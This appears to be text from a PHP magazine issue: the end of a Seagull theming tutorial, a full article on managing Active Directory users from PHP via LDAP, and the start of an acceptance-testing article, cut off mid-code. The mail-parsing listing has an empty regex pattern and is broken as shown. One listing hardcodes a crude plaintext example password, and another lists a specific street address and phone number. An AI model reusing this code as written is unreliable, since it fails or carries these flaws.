Our site still looks like a fresh installation of Seagull. No problem, this is very easy to solve. You just have to change two or three files and soon it will look very different. To create your own look and feel, you need to add your own theme by creating a new directory in the seagull/www/themes directory, e.g. seagull/www/themes/myTheme. Copy the default module’s templates from www/themes/default/default/ into your new theme directory www/themes/myTheme/default/, and do the same with the css and images directories. The other templates don’t have to be copied to your new theme if you don’t want to change them. Seagull automatically uses the default theme for templates not found in your new theme directory.

You can change much of the layout by simply editing the CSS in the style sheet, without any need to create a new theme. Editing the CSS is simpler, and it ensures that the templates remain up to date if a change is made in the module’s template. You may wonder why you should make a new theme if you only want to change one or two files. The reason is that it’s better to separate your changes from Seagull’s default code, so you can update the framework to a new version more easily without touching the changes you’ve made.

Let’s change the following two files in your theme’s default folder: banner.html and footer.html. There is also a file called header.html, however this contains everything from the first tag until the end of the opening tag and does not need to be modified. You can also modify the main CSS file: seagull/www/themes/myTheme/css/style.php. Activate the new theme by adding it to the global preferences: change the theme preference’s value to the name of your new theme directory, e.g. myTheme, and voilà, you can see the new layout you have created by just modifying two or three files. To see what’s possible by doing nothing but modifying themes, have a look at the Seagull homepage and try out the theme switcher.
Conclusion
We’ve tried to make this tutorial as easy to follow as possible. If you have successfully created the wishlist module, you will be able to create almost any site you need using the Seagull Framework. By following the design constraints imposed by Seagull, you will have a site that can connect to multiple databases, a site that’s modular and easy to update and modify, and a site that is easily translatable. Welcome to the world of fast web development!
WILLIAM ZELLER is currently a senior at Trinity College in Hartford, CT. He has worked with PHP for over seven years and has contributed to various open source applications. WERNER M. KRAUSS joined the Seagull developer community in the spring of 2004, when searching for a good framework that he could use for his projects. He now maintains the project’s documentation wiki. In his free time, he loves to play the guitar in different bands. He can be contacted at: [email protected]
FEATURE
User Management with Active Directory
Active Directory (AD) can often be found in the installation of Microsoft Windows Server 2003 whenever it is set up as a domain. This article can be used to assist you, the programmer, when accessing, inserting, or altering objects within an AD structure.
by CHAD R. SMITH

This article has been broken into four sections in order to make it easier for you to find your section of interest. First, I am going to give you so much information about Active Directory (AD) it will make your head spin! If you’re not a beginner in AD, feel free to skip this section and move to later parts of the article, which are intended for more advanced programmers. For all of you new programmers that are just beginning your work within AD, or if you’re a bit rusty in this area, this first part is an absolute must read. The second part of this article will then walk you through some code samples concerning how to get information out of AD. In addition, I’ll show you how to authenticate the user just as Microsoft does each time the user logs into the domain. In section three, I will go through the process of pulling information from AD, and I will show you how to add or alter existing information. In the final section, I will provide some simple advice on how to implement what I’ve covered into your existing code.
PHP: 4.x.x compiled with LDAP extension
O/S: Any that can run a server with PHP
OTHER SOFTWARE: Windows Server 2003 Active Directory with DNS support enabled.
LINKS:
1. http://www.computerperformance.co.uk/Logon/LDAP_attributes_active_directory.htm
2. http://www.rfc-editor.org/rfc/rfc2251.txt
3. http://www.microsoft.com/resources/documentation/WindowsServ/2003/standard/proddocs/en-us/Default.asp?url=/resources/documentation/WindowsServ/2003/standard/proddocs/en-us/ad_server_role.asp
4. http://www.developer.com/open/article.php/10930_3100951_2
5. http://www.mozilla.org/directory/standards.html
6. http://php.net/manual/en/ref.ldap.php
7. http://www.oreilly.com/catalog/actdir2/index.html
CODE DIRECTORY: activedir
TO DISCUSS THIS ARTICLE VISIT: http://forum.phparch.com/266

This code was tested on Microsoft Windows Server 2003 Enterprise and Standard setups; both were installed with Active Directory and no settings were changed. Extra items that were installed were Apache 2.0.54 and PHP 4.4; nothing else was added or changed from the original configuration. LDAP has been part of PHP since its inception in PHP 3; therefore, it is available under any current PHP version.

All About Active Directory
Active Directory is an LDAP-based directory service that was developed by Microsoft in order to replace the flat structured Windows NT domain. This system was made in an attempt to provide a more flexible and robust network operating system. The flat structured NT domain setup imposed limitations such as poor replication between domain controllers over high-latency or low-bandwidth links, the lack of delegation of administration, and a limit on the number of objects that could be created within a domain. In order to solve these problems, Microsoft created an LDAP-based directory service. Microsoft’s Windows 2003 Server Active Directory supports not only the baseline components of LDAP compliance, but also extends this baseline by providing support for the informational and proposed RFCs of LDAP (see links 1 and 2).

In my AD environment, I set up a very basic arrangement that consisted of one Microsoft Windows Server 2003 setup, which I configured as a domain controller and an AD server. In addition, I installed Apache 2.0.54 and ran PHP 4.4.x compiled with the LDAP extension. For the test environment my DNS/domain name was 50marketing.com. For my production environment there were other considerations to take into account, such as how many people would be accessing the domain and how many would be accessing it through the web. Setting Up Windows Server 2003 as a Domain Controller, a tutorial developed by Microsoft (link 3), is a useful resource. Select the best option for the type of environment you want to set up.

The configuration in this article was only intended for a limited test environment and not for an actual production environment. In “real-world” situations, it would be a bad idea to set up your Domain Controller and Web Server on the same machine. This is because, if the web server was hacked into or altered in any way, then your Active Directory server would not be accessible to users. This could create a great deal of trouble if the domain is down without warning to users. In particular, large enterprise environments should take heed of this warning. Not to worry, there is still plenty more to learn about how AD does its business and how to set up a proper installation that meets your business’s needs. Personally, I found the installation of AD on Windows Server 2003 to be very simple and direct. Remember, I did not alter anything during the installation of AD on the server in order to make this work.
One of the ideas behind AD was to provide a central repository that contained information about users, computers, groups, printers, applications, etc. This data is stored in a hierarchical fashion, similar to a file structure, with each entry referred to as an object class. Although there are a few different types of objects, this article concentrates on examples for accessing user and computer class objects. Even though each class contains its own set of associated attributes, classes share some common ones as well. For example, if you want to obtain the user account name or computer name of an object, the sAMAccountName attribute would be included in your query. The name attribute would also produce an example of an NT username. In every example I used “chadsmith”, and the fully qualified name was “[email protected]” or in some cases “CN=chadsmith,CN=Users,DC=50marketing,DC=com”. Since each object has a significant number of attributes associated with it, I suggest consulting MSDN, Google, or using the ADSI Edit utility provided with the Windows 2003 Server support kit to view the various object attributes. Other examples can be found in the further reading section. Some of the more commonly used attributes of a user object are sAMAccountName, description, mail, memberOf, and sn. These attributes indicate the user account name, the description of the account, email address, groups, and the user’s last name, respectively.
Make Our First Active Directory PHP Connection
Now, with AD basics covered, we have arrived at the programming part of the article. Imagine never having to write another “Lost Password” type of page, not needing to write a database table to track all the user passwords, or not even having to record the last time users logged into the system. How about not having to keep track of user permissions via a complex system? Sounds pretty good, right? Well, keep on reading, because this is the main drive behind this article. Personally, I was tired of writing pages to change passwords, retrieving questions about users’ pets or sending emails because a user forgot his password. Because AD can be used for authentication, it takes security to a whole new level, forcing Microsoft’s software to do the password authentication, and not your own system. Some have recommended putting this system on an Intranet, but keep in mind that it can be done through the Internet, and, as always, having SSL set up for passwords is never a bad idea.

With AD fully implemented into your upcoming or existing applications, your users will only be required to remember a single password that will work for all integrated systems. One password makes administration a snap when everything is in one place and is in a secured environment. With PHP and AD working together, you can see which groups a user belongs to, and you can even use AD to administer these groups. There is now no need for a separate database to keep track of who is part of which group. Now, let’s get to the code. Please note that there are no comments so that I can save space within this article. Fully commented code examples can be found in the code archive.
Your First Active Directory Connection
Active Directory is very “picky”; it needs to be initialized before it will allow any actions to be taken with it or against it. In order to perform AD-related activities, you must get a connection to the server and send it proper credentials. Setup for this task is easy. First, you need the IP or host name of the server where AD is located. Then, you need to provide it a valid user and password. Breaking down this code (Listing 1) is really quite simple. The connection-establishing code must be understood first, because it is the foundation of all the code samples, not only in this article but in any other AD work done from PHP. The ldap_connect() function will attempt to get a connection to the LDAP server. If successful, it returns a resource_id. Next, ldap_bind() will attempt to authenticate that resource_id with the server by passing the username and password. In other words, the system will ask AD if the username and password provided are correct. If so, the system will return true and the function will, in turn, return true. Simply put, this script should output “User Authenticated”. Other possible outputs are “User NOT Authenticated” and “Fatal error: Call to undefined function: ldap_connect()”. If you get a message like these, obviously, something is wrong. The first indicates that the username and/or password are not valid. The second indicates that PHP’s LDAP extension is not installed correctly.
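The connect-then-bind sequence described above can be sketched roughly as follows. This is not Listing 1: adAuthenticate(), the host name ad.example.com and the user@domain login format are assumptions made for illustration. The empty-password guard is an addition of this sketch, because many LDAP servers treat an empty password as an anonymous bind that succeeds.

```php
<?php
// Sketch of connect-then-bind authentication. Host name and login
// format are hypothetical; adjust them to your own domain.
function adAuthenticate($host, $user, $password)
{
    // An empty password may be accepted as an anonymous bind,
    // so reject it before talking to the server at all.
    if ($user === '' || $password === '') {
        return false;
    }
    if (!function_exists('ldap_connect')) {
        // PHP was built without the LDAP extension.
        return false;
    }
    $conn = ldap_connect($host);
    if (!$conn) {
        return false;
    }
    // Commonly set when talking to Active Directory.
    ldap_set_option($conn, LDAP_OPT_PROTOCOL_VERSION, 3);
    ldap_set_option($conn, LDAP_OPT_REFERRALS, 0);

    // @ suppresses the warning PHP raises on a failed bind.
    $ok = @ldap_bind($conn, $user, $password);
    ldap_unbind($conn);
    return $ok;
}

// The empty password is rejected without contacting any server.
echo adAuthenticate('ad.example.com', 'chadsmith@example.com', '')
    ? "User Authenticated\n"
    : "User NOT Authenticated\n";
```

Checking function_exists() first turns the fatal “undefined function” error mentioned above into an ordinary failed login, which may or may not be what you want while debugging an installation.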
Retrieving User Information
Now that we’ve established a connection, let’s grab more information from AD. Imagine that you would like to pre-fill a form with certain information about the user, but you don’t store their information in your database and you would like to use AD for this purpose. Filling in the user’s phone number, address, and other elements (that can be derived from the AD server) will help your users by requiring them to type less. The code to accomplish this can be seen in Listing 2. For the purposes of further discussion, we will assume that a connection is already established. Some of the following code might require the administrator privilege.

You’ll see a variable called $filter in the code; keep in mind that it should be treated almost like a SQL statement. The $attributes variable represents the actual pieces of data that you want to receive back from AD. These field names should be separated by commas. AD will supply you only with the fields you request and nothing more. If you do not supply $filter and $attributes, nothing will be returned. The LDAP query yields a confusing return value. The $info variable is a large array of all that was returned from AD. I encourage you to do a print_r() on the $info variable, at least once, to see what is being returned. Dumping a variable like this is a great way to debug your application and explore the variables that come out of AD. Figure 1 contains the output of the Listing 2 script. You can think of ldap_get_entries() as mysql_fetch_array(). We will cover this next.
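Since the shape of $info is the confusing part, here is a sketch that works on a hand-written array in the layout ldap_get_entries() produces: a 'count' key at every level, numeric keys holding attribute names, and lowercased attribute names as keys. The values and the firstValues() helper are made up for illustration.

```php
<?php
// Hand-written array in the shape ldap_get_entries() returns;
// the values are invented for this example.
$info = array(
    'count' => 1,
    0 => array(
        'dn' => 'CN=chadsmith,CN=Users,DC=50marketing,DC=com',
        'count' => 2,
        0 => 'samaccountname',
        'samaccountname' => array('count' => 1, 0 => 'chadsmith'),
        1 => 'telephonenumber',
        'telephonenumber' => array('count' => 1, 0 => '555-0100'),
    ),
);

// Return the first value of one attribute for every entry.
function firstValues(array $info, $attribute)
{
    $attribute = strtolower($attribute); // attribute keys are lowercased
    $values = array();
    for ($i = 0; $i < $info['count']; $i++) {
        if (isset($info[$i][$attribute][0])) {
            $values[] = $info[$i][$attribute][0];
        }
    }
    return $values;
}

print_r(firstValues($info, 'sAMAccountName'));
```

Looping up to $info['count'] rather than using foreach avoids tripping over the 'count' entries that sit alongside the real data.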
Using AD Groups
You can use Microsoft’s AD groups to your advantage. You can fetch a list of all of the groups that the user belongs to, and check those groups against the ones your application recognizes. For example, if you are creating an accounting system, you could place all of the accountants into one group. When a user logs into the system, you can authenticate the user against AD and then check their groups to ensure that they are allowed to use your application. Allowing AD to manage the groups gives website developers, database developers, and domain administrators a common ground. This next script (Listing 3) is very basic and could be cut down to a smaller script, but is presented this way for educational purposes. This code is similar to ldap.get.userinfo.php (see the code archive). The difference lies in the attributes that are pulled from AD. I chose this script because of the unusual way in which AD returns the memberOf attribute. I suggest running print_r() to see how the array is returned from AD; by doing so, you will notice that the memberOf attribute is another AD-structured array within an array. This may sound confusing, but simply put, it means that you will need to loop over the attribute itself to parse the nested data. When I first started developing with the memberOf attribute, I was confused about how AD structured the data. Once I figured this out, the method I use to parse it came about very quickly. One way that I use it is to compare the groups of which the user is a member against my list of “allowed” groups, in array form. Here’s an example:
$compare_array[0]["PHP Developers"][1] = "";
$compare_array[1]["50 Marketing Employees"][1] = "";
// General form: $compare_array[n]["Group Name"][privilege level] = "";
Once this comparison has been made, your code can assign a permission level based on the user’s groups. After I authenticated the user and found their privilege level, I stored that level in a $_SESSION variable. The application I was developing then read the $_SESSION variable to determine whether the user had the correct permission level, instead of querying AD on every page load. Doing so saved server resources and access time.
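The comparison described above can be sketched as follows. This is a simplified illustration rather than the author's implementation: it uses a flat map of group name to privilege level instead of the three-level $compare_array, the function names and the numeric levels are made up, and the naive CN= match assumes group names contain no escaped commas.

```php
<?php
// Hypothetical helpers for comparing a user's memberOf values with allowed groups.

// Extract the group names from a memberOf array as returned inside ldap_get_entries().
function group_names(array $memberOf): array
{
    unset($memberOf['count']);
    $names = [];
    foreach ($memberOf as $dn) {
        // Take the value of the leading CN= component of each group DN.
        if (preg_match('/^CN=([^,]+)/i', $dn, $matches)) {
            $names[] = $matches[1];
        }
    }
    return $names;
}

// Return the highest privilege level granted by any matching group, or 0 for none.
function privilege_level(array $memberOf, array $allowedGroups): int
{
    $level = 0;
    foreach (group_names($memberOf) as $name) {
        if (isset($allowedGroups[$name])) {
            $level = max($level, $allowedGroups[$name]);
        }
    }
    return $level;
}

// Invented privilege levels for two of the group names used in the article.
$allowed = ['PHP Developers' => 2, '50 Marketing Employees' => 1];
$memberOf = [
    'count' => 2,
    0 => 'CN=PHP Developers,CN=Users,DC=50marketing,DC=com',
    1 => 'CN=Domain Users,CN=Users,DC=50marketing,DC=com',
];

$level = privilege_level($memberOf, $allowed);
```

After login, the resulting $level is the kind of value that could be stored in $_SESSION so that later page loads do not need to query AD again.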
Altering Information in Active Directory
It is very easy to retrieve information from Active Directory. The tough part comes when you try to insert users into the AD structure. Microsoft has built many safeguards into AD to protect the system as much as possible. For the scripts in this section, binding as the “Administrator” user is sufficient if you have access to the administrator password. If you do not, have a user added to the “Domain Admins” group and bind as that user.
Add a User to Active Directory
The main function used when adding information to AD is ldap_add(). Let’s look at how ldap_add() works, and how it can be used. It adds a new object to AD. If AD already contains an object with the same CN and/or samaccountname, the new object cannot be added and you will receive an error. Some attributes cannot be added to AD, and others will appear to have been added, but are not actually saved. Remember, I said that Server 2003 is really picky and very unfriendly when it comes to adding objects. I will now demonstrate how to use ldap_add() on a standard installation. This should work in most cases, perhaps with some minor editing. Listing 4 contains the code segment that we will be discussing. This script is broken into many parts, but most are “behind the scenes.” As you can see from the script, it is quite simple to add the attribute names and the preferred values. Keep in mind that the $base_dn field is crucial; if it is set improperly, you will receive an error when the script is executed. The CN at the start of $base_dn must carry the same value as the cn and samaccountname attributes. If they do not match, you will receive an error message from the AD server and user creation will fail.

LISTING 1
<?php
// Script Name: ldap.connection.inc.php
// $domain, $domain_username and $password are expected to be set before this point.
$ldap_conn = ldap_connect("ldap://$domain")
    or die("The connection to the ldap server " . "$domain failed.");

// Ask the server whether the supplied credentials are valid.
$ldapbind = ldap_bind($ldap_conn, $domain_username, $password);
if ($ldapbind) {
    echo "User is authenticated. ";
} else {
    echo "User is not authenticated. ";
}
?>

LISTING 4
<?php
// Script Name: ldap.add.user.php
// Attributes of the new user object.
$adduserAD["cn"] = "chadsmith";
$adduserAD["samaccountname"] = "chadsmith";
$adduserAD["objectClass"] = "user";
$adduserAD["displayname"] = "Chad R. Smith";
$adduserAD["mail"] = "[email protected]";
$adduserAD["userPassword"] = "totalWhiteGuy";
$adduserAD["userAccountControl"] = "512";

// Where the object is created; the leading cn must match the values above.
$base_dn = "cn=chadsmith,cn=Users,DC=50marketing,DC=com";

echo "Trying to add the user to the system ... ";
if (ldap_add($ldap_conn, $base_dn, $adduserAD) == true) {
    echo "User added! ";
}
?>
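Because a mismatch between the DN and the attribute array is such an easy mistake, one option is to build both from a single account name. The sketch below assumes a helper named build_user_entry(), which is not part of the article's code archive, and deliberately rejects names containing characters that would need escaping in a DN rather than trying to escape them.

```php
<?php
// Hypothetical helper: derive the DN and the attribute array from one account name
// so that the leading cn of the DN cannot drift away from cn/samaccountname.
function build_user_entry(string $account, string $displayName, string $container): array
{
    // Refuse characters that have a special meaning inside a DN.
    if ($account === '' || preg_match('/[,+"\\\\<>;=#]/', $account)) {
        throw new InvalidArgumentException('Account name is empty or needs DN escaping.');
    }
    $entry = [
        'cn'             => $account,
        'samaccountname' => $account,
        'objectClass'    => 'user',
        'displayname'    => $displayName,
    ];
    $dn = 'cn=' . $account . ',' . $container;
    return [$dn, $entry];
}

list($dn, $entry) = build_user_entry(
    'chadsmith',
    'Chad R. Smith',
    'cn=Users,DC=50marketing,DC=com'
);
// $dn and $entry could then be passed to ldap_add($ldap_conn, $dn, $entry).
```

The remaining attributes from Listing 4, such as mail or userAccountControl, could be merged into $entry before the call.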
Add an Attribute to a User Account
If you already have a user object set up in the AD structure, and you want to add an attribute to that object, the easiest way is to use ldap_mod_add(). Assume that you have a page where a new user logs into the server, and it’s the user’s first time accessing her account on your system. You can use ldap_mod_add() to let her fill in properties about herself without the assistance of a system administrator. Your application can benefit from this extra information. Error checking should be done on each field to ensure that it meets your organization’s requirements. Listing 5 shows this in action. The part of the script that deserves discussion is the $mod_userAD array. This array holds all of the values that you would like to add to AD and that are not already present. If an attribute being changed already has a value, AD will throw an error and the change will not occur.
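The per-field error checking mentioned above might look something like the following sketch. The function name filter_profile_fields() and every validation rule in it are assumptions chosen for illustration (US-style postal codes, a loose phone pattern); an organization would substitute its own requirements.

```php
<?php
// Hypothetical whitelist filter: only known attributes with acceptable values survive.
function filter_profile_fields(array $submitted): array
{
    // Illustrative rules only; adjust them to local requirements.
    $rules = [
        'givenName'       => '/^[\p{L} .\'-]{1,64}$/u',
        'sn'              => '/^[\p{L} .\'-]{1,64}$/u',
        'postalCode'      => '/^\d{5}(-\d{4})?$/',
        'telephoneNumber' => '/^[0-9 ()+.-]{7,20}$/',
    ];
    $clean = [];
    foreach ($rules as $attribute => $pattern) {
        if (!isset($submitted[$attribute]) || !is_string($submitted[$attribute])) {
            continue;
        }
        $value = trim($submitted[$attribute]);
        if ($value !== '' && preg_match($pattern, $value)) {
            $clean[$attribute] = $value;
        }
    }
    return $clean;
}

$mod_userAD = filter_profile_fields([
    'givenName'          => 'Chad',
    'sn'                 => 'Smith',
    'postalCode'         => '15944',
    'telephoneNumber'    => '1-724-676-4703',
    'userAccountControl' => '512',   // not on the whitelist, so it is dropped
]);
```

Only the filtered array would then be handed to ldap_mod_add(), so a form cannot be used to set attributes the application never intended to expose.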
Adding a Group to Active Directory
Groups are common in a typical AD structure. They are a great way to allow administrators to grant permissions to a number of users at once, instead of on an individual basis. One way that 50 Marketing implemented a group-based permission scheme was by granting our sales team read access to our priorities listing. If we ever decide to allow the sales people to alter the reports, we don’t have to change the permissions on each user; a change to the common group propagates throughout the whole system. I thought this was a great way to show how to implement this feature in future applications. The script may look very similar to ldap.add.user.php (see the code archive), with some minor changes. The most apparent difference between the two is the objectClass attribute, which is now set to Group instead of User. Take a look at Listing 6. Again, this code is simple to follow, and takes virtually no time to implement. It will ensure that your groups are set up correctly. Group members can be chosen from a drop-down box or typed in manually.
Delete a User from Active Directory
Deleting a user is a very simple process and requires almost no programming effort. There are, however, some concerns that we must discuss before I show you how to do this. First, if the user has any Exchange accounts, the following code will not delete them. Second, if the user has files associated with the account, they will not be deleted or moved; when this script deletes the account, it will leave orphan files behind on the server. A few scripts can tidy up the mess that AD itself doesn’t handle. However, if you are sure that the user doesn’t have an e-mail account and wouldn’t leave behind any orphan files, or you simply don’t care and want the user deleted, Listing 7 shows how you do it. There are only a few lines there, but they are very important and need to be discussed. The first line contains $users_fully_qualified, which is the fully qualified name of the user you are trying to delete. You must tell AD exactly where that user can be found; if you don’t, the system will not know where the user is located and will not be able to delete them. If the script fails to delete a user, it will tell you the reason. If you’re receiving an error, one thing to check is that the path you are passing is accurate. Passing a half-qualified name (example: CN=chadsmith,DC=50marketing,DC=com) isn’t sufficient. You must use something more like CN=chadsmith,CN=Users,DC=50marketing,DC=com. This tells AD that the user chadsmith in the Users folder needs to be deleted. It also means that you can put users in any folder, or even any subfolder; you just have to know where the user is placed and you will be set.
Delete an Attribute in Active Directory
Deleting an attribute is a straightforward process, accomplished with ldap_mod_del(). This function returns true if it is successful and false if it is unable to complete the requested action. It is very similar to ldap_mod_add(), but instead of adding an attribute, it deletes it. I cannot stress enough that once the information has been overwritten or deleted, it cannot be retrieved. The script in Listing 8 works much like the others, by sending an array of values to AD; the main difference is that with ldap_mod_del() you delete an attribute by passing an empty array as its value.
LISTING 5
<?php
// Script Name: ldap.mod.add.user.php
// Attributes to add; none of them may already hold a value in AD.
$mod_userAD["givenName"] = "Chad";
$mod_userAD["sn"] = "Smith";
$mod_userAD["streetAddress"] = "1820 Mulligan Hill Rd.";
$mod_userAD["l"] = "New Florence";
$mod_userAD["st"] = "PA";
$mod_userAD["postalCode"] = "15944";
$mod_userAD["telephoneNumber"] = "1-724-676-4703";
$mod_userAD["title"] = "Director of Web Development";

$base_dn = "cn=chadsmith,cn=Users,DC=50marketing,DC=com";

echo "Trying to add the contents to the user ... ";
// $ldap_conn is the bound connection from ldap.connection.inc.php.
if (ldap_mod_add($ldap_conn, $base_dn, $mod_userAD) == true) {
    echo "User’s information added! ";
}
?>
Edit User Information in Active Directory
Editing users’ information is a critical part of maintaining accurate records and user accounts. Applications whose user accounts change frequently benefit from having this functionality built in. Another use is to let users log into their account and change some of their own information, such as their name, address, and e-mail address. The same rule that applied to the previous scripts applies here: if information is overwritten, you will not be able to retrieve the former values. Let’s review the next script with a scenario that happens very often in the “real world.” When a user marries and takes a new last name, the name in AD has to be changed to match. The script in Listing 9 turns that annoying chore into a quick, effortless one. We will assume that we have a user with the samaccountname of Maria whose sn is currently Carbone. We need to change her last name to Smith, to make her name current in the global address book. Running this script should produce “User’s information has been altered.” The changes made by this script take effect immediately, and can be picked up by your application’s auto-fill feature, if you use one.
LISTING 7
<?php
// Script Name: ldap.del.user.php
// The full DN, including the container that holds the user.
$users_fully_qualified = "cn=chadsmith,cn=Users,"
    . "DC=50marketing,DC=com";

echo "Trying to delete the user from AD ... ";
if (ldap_delete($ldap_conn, $users_fully_qualified) == true) {
    echo "User has been deleted. ";
}
?>

LISTING 8
<?php
// Script Name: ldap.mod.del.user.php
// An empty array removes every value of the attribute.
$mod_delAD["mail"] = array();
$base_dn = "cn=chadsmith,cn=Users,DC=50marketing,DC=com";

echo "Trying to delete the contents to the user... ";
if (ldap_mod_del($ldap_conn, $base_dn, $mod_delAD) == true) {
    echo "User’s information has been deleted. ";
}
?>

LISTING 9
<?php
// Script Name: ldap.modify.user.php
// Replace the current surname with the new one.
$modifyAD["sn"] = "Smith";
$base_dn = "cn=Maria,cn=Users,DC=50marketing,DC=com";

echo "Trying to modify the contents to the user... ";
if (ldap_modify($ldap_conn, $base_dn, $modifyAD) == true) {
    echo "User’s information has been altered. ";
}
?>

Conclusion
My hope is that this article was presented in a way that was both informational and interesting. Some of the techniques used here can be considered foundational to the next generation of user-authenticated applications. Imagine how nice it would be to avoid writing another lost password page and to have all of your security in good order because you let Active Directory take care of all the password security and encryption. Implementation is quick and easy; typically, login pages identify the user either by e-mail address or by username. Now, when users type in their username and password, instead of authenticating them through a database or flat file, it’s possible to authenticate them through AD. As with any new system, it is wise to have a testing server. To implement this, you won’t have to change much code after the login; of course, this depends on the size of your application and your specific needs. If you find something that works better, faster, or more securely, please contact me. I will always be exploring and discovering new possibilities where AD can be used.
CHAD SMITH was born and raised in Columbus, Ohio. He recently graduated from DeVry University with a B.S. in Computer Engineering and is currently working for 50 Marketing (www.50marketing.com), where he is the Director of Web Development. 50 Marketing is a full-service competitive marketing and advertising agency that delivers more than just services; it delivers momentum. You can contact Chad directly at [email protected].
TEST PATTERN
To Test is to Fake
A system test, or “acceptance” test, is very much a black box operation. You set the system up as it is intended to be used and then you carry out realistic user actions and examine the results. When automated, such tests are a powerful technique that helps to ensure delivery of requirements as well as to assure quality. The problem is that these tests wreak havoc. They change data, send e-mails and so on. Not only do you want to avoid this on the live system, it probably isn’t possible at all on a development box. So, how do we test the whole system?
by MARCUS BAKER
Anyone who has worked with me knows that I am a big fan of testing, preferably with tests written before the code. If testing is a good thing, why not make use of it at the earliest opportunity? Now, testing is tedious and error prone if done manually, so I accept nothing less than an automated test suite. I also expect the resulting test code to document the system. This cuts down on written documentation, which few people will ever read anyway, and it’s also definitive. Unlike comments, the tests won’t lie. This technique (called “acceptance tests”) is especially valuable to ensure that requirements have been met. You can monitor project progress as more and more use cases pass, and it’s easier to achieve sign-off if you have a test suite as proof. When written before the code itself, the acceptance tests help to precisely define the scope of the project early on. If you have seen projects develop a “long tail” of bickering towards the end, with many last-minute changes, you will appreciate how useful this can be. Having coded this way for four years, I have collected a few personal tricks and tools to make my life easier. This means that the examples in this article may be a little idiosyncratic. I am not trying to promote my own tools, but one essential idea; there are certainly alternatives that are equally good or better. The idea is that far more of what we do can be tested automatically than we tend to think. Unfortunately, there is some real effort involved in testing larger chunks of code. Hopefully I’ll demonstrate that the extra work is not so much after all, and in so doing convince you to plan for this small additional effort.

PHP: Any
OTHER SOFTWARE: SimpleTest, fakemail, phpmailer
TO DISCUSS THIS ARTICLE VISIT: http://forum.phparch.com/267
CODE DIRECTORY: fake
The Padded Cell
Tests must be repeatable. A test that fails occasionally is one that you cannot trust even when it passes. Tests must work 100% of the time. Unfortunately, this is not always the case. Code that depends on outside resources, such as an external connection, could fail not because of the code itself, but simply because the resource became unavailable. A test that fails occasionally in this way cannot be trusted: when it does finally fail for a good reason, the failure will likely be ignored. If it’s ignored, why write the thing in the first place? When we are testing single classes, in what are called unit tests, we can fake the risky stuff with mock versions of the objects that wrap resources. Say we have some code like this:
$list = new MailList($mailer);
$list->send($monthly_report);
LISTING 4
<?php
class RegistrationTest extends WebTestCase {
    function home() {
        $configuration = new Configuration();
        return $configuration->get('home');
    }

    function setUp() {
        // Refuse to run against the live configuration.
        $configuration = new Configuration();
        if ($configuration->isLive()) {
            die('About to delete all data');
        }
        $database = new Database();
        $database->clear();
        $database->build();
        $this->startFakemail();
    }

    function tearDown() {
        $database = new Database();
        $database->clear();
        $this->stopFakemail();
    }

    function testHappyPath() {
        $this->get($this->home());
        $this->click('Register');
        $this->setField('E-mail', 'me@home');
        $this->setField('Password', 'secret');
        $this->click('Submit');
        $this->assertText('A mail has been sent');
        $finder = new UserFinder();
        $user = $finder->findByName('me');
        $this->assertTrue($user->isPending());
        $this->clickMailLink('me@home');
        $this->assertText('Welcome');
        $user = $finder->findByName('me');
        $this->assertFalse($user->isPending());
    }

    function clickMailLink($address) {
        // fakemail saves the first message for an address as "<address>.1".
        $mail = file_get_contents("$address.1");
        // The pattern should capture the confirmation URL as $matches[1].
        preg_match('//', $mail, $matches);
        $url = str_replace(array('"', "'"), '', $matches[1]);
        $this->get($url);
    }

    function startFakemail() {
        $configuration = new Configuration();
        $host = $configuration->get('mail_host');
        $port = $configuration->get('mail_port');
        $command = "fakemail --path=../temp " .
                "--host=$host --port=$port " .
                "--background";
        $this->_pid = `$command`;
    }

    function stopFakemail() {
        $command = 'kill ' . $this->_pid;
        `$command`;
    }
}
?>

If we are testing MailList, we can fake its interaction with the mail system, as in Listing 1. Here, we are using SimpleTest (http://sf.net/projects/simpletest) to generate a mock version of the mailer. The mock version does not send any mails; it just responds as it should, and makes sure it is called appropriately. You can hand code mock objects fairly easily, but using a tool can make things a little tidier. Here, for instance, the mock object can send messages to the test suite when an expectation is not met. This saves you from sifting through the history of the mock.
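For comparison with a generated mock, a hand-coded one can be very small. The sketch below is only an illustration: the RecordingMailer class is invented, and this MailList takes a list of addresses in its constructor, which is an assumption made to keep the example self-contained rather than the signature used in the article.

```php
<?php
// Illustrative stand-in for the class under test; the real MailList is not shown in the article.
class MailList
{
    private $mailer;
    private $addresses;

    public function __construct($mailer, array $addresses)
    {
        $this->mailer = $mailer;
        $this->addresses = $addresses;
    }

    // Send the same message to every address on the list.
    public function send($message)
    {
        foreach ($this->addresses as $address) {
            $this->mailer->send($address, $message);
        }
    }
}

// Hand-coded mock: it sends nothing and simply records how it was called.
class RecordingMailer
{
    public $sent = array();

    public function send($to, $body)
    {
        $this->sent[] = array($to, $body);
        return true;
    }
}

$mailer = new RecordingMailer();
$list = new MailList($mailer, array('me@home', 'you@work'));
$list->send('Monthly report');
// The test then inspects $mailer->sent instead of a real mailbox.
```

The drawback mentioned above is visible here: the test has to sift through $mailer->sent after the fact, whereas a generated mock can report an unmet expectation to the test suite as it happens.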
Web Page Testing
By intercepting every communication with the outside world, we have placed the code under test into a little padded cell. It will always receive the same results because we control everything. Easy for classes, but have a look at this code snippet:
class RegistrationTest extends WebTestCase {
    function testHappyPath() {
        $this->get($this->home());
        $this->click('Register');
        $this->setField('E-mail', 'me@home');
        $this->setField('Password', 'secret');
        $this->click('Submit');
        $this->assertText('A mail has been sent');
    }
}
This example is the start of an acceptance test. The system is supposed to sign up a new user who clicks on the “Register” link and then submits a form. The test code uses SimpleTest again (see later for alternatives), which acts as a web browser. It fetches pages and clicks buttons using HTTP just like a standard web browser. This way, it treats the software as a black box, and simulates a real user. The trouble is, because the code under test now runs in a separate process, we have no access to it. The top level script will start up with the live objects and classes whether we like it or not. Intercepting at the code level is no longer possible. Luckily, most applications have an alternative hook for switching resources on different machines, namely the configuration file. If we can replace this for testing, then we can redirect the live code to use fake resources, resources that never change. Let’s do it.
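As a rough idea of what such a replaceable configuration could look like, here is a sketch of a Configuration class with the get() and isLive() methods the test code relies on. It is not the article's listing: the constructor argument naming the directory, the key=value file format, and the rule that a file called "test" takes precedence over one called "live" are assumptions made for this example.

```php
<?php
// Hypothetical sketch of a configuration that a test file can override.
class Configuration
{
    private $settings = array();
    private $live;

    public function __construct($directory)
    {
        // A file called "test" wins over "live" whenever it exists.
        $test = $directory . '/test';
        $this->live = !is_file($test);
        $file = $this->live ? $directory . '/live' : $test;

        $lines = is_file($file)
            ? file($file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES)
            : array();
        foreach ($lines as $line) {
            if (strpos($line, '=') === false) {
                continue;
            }
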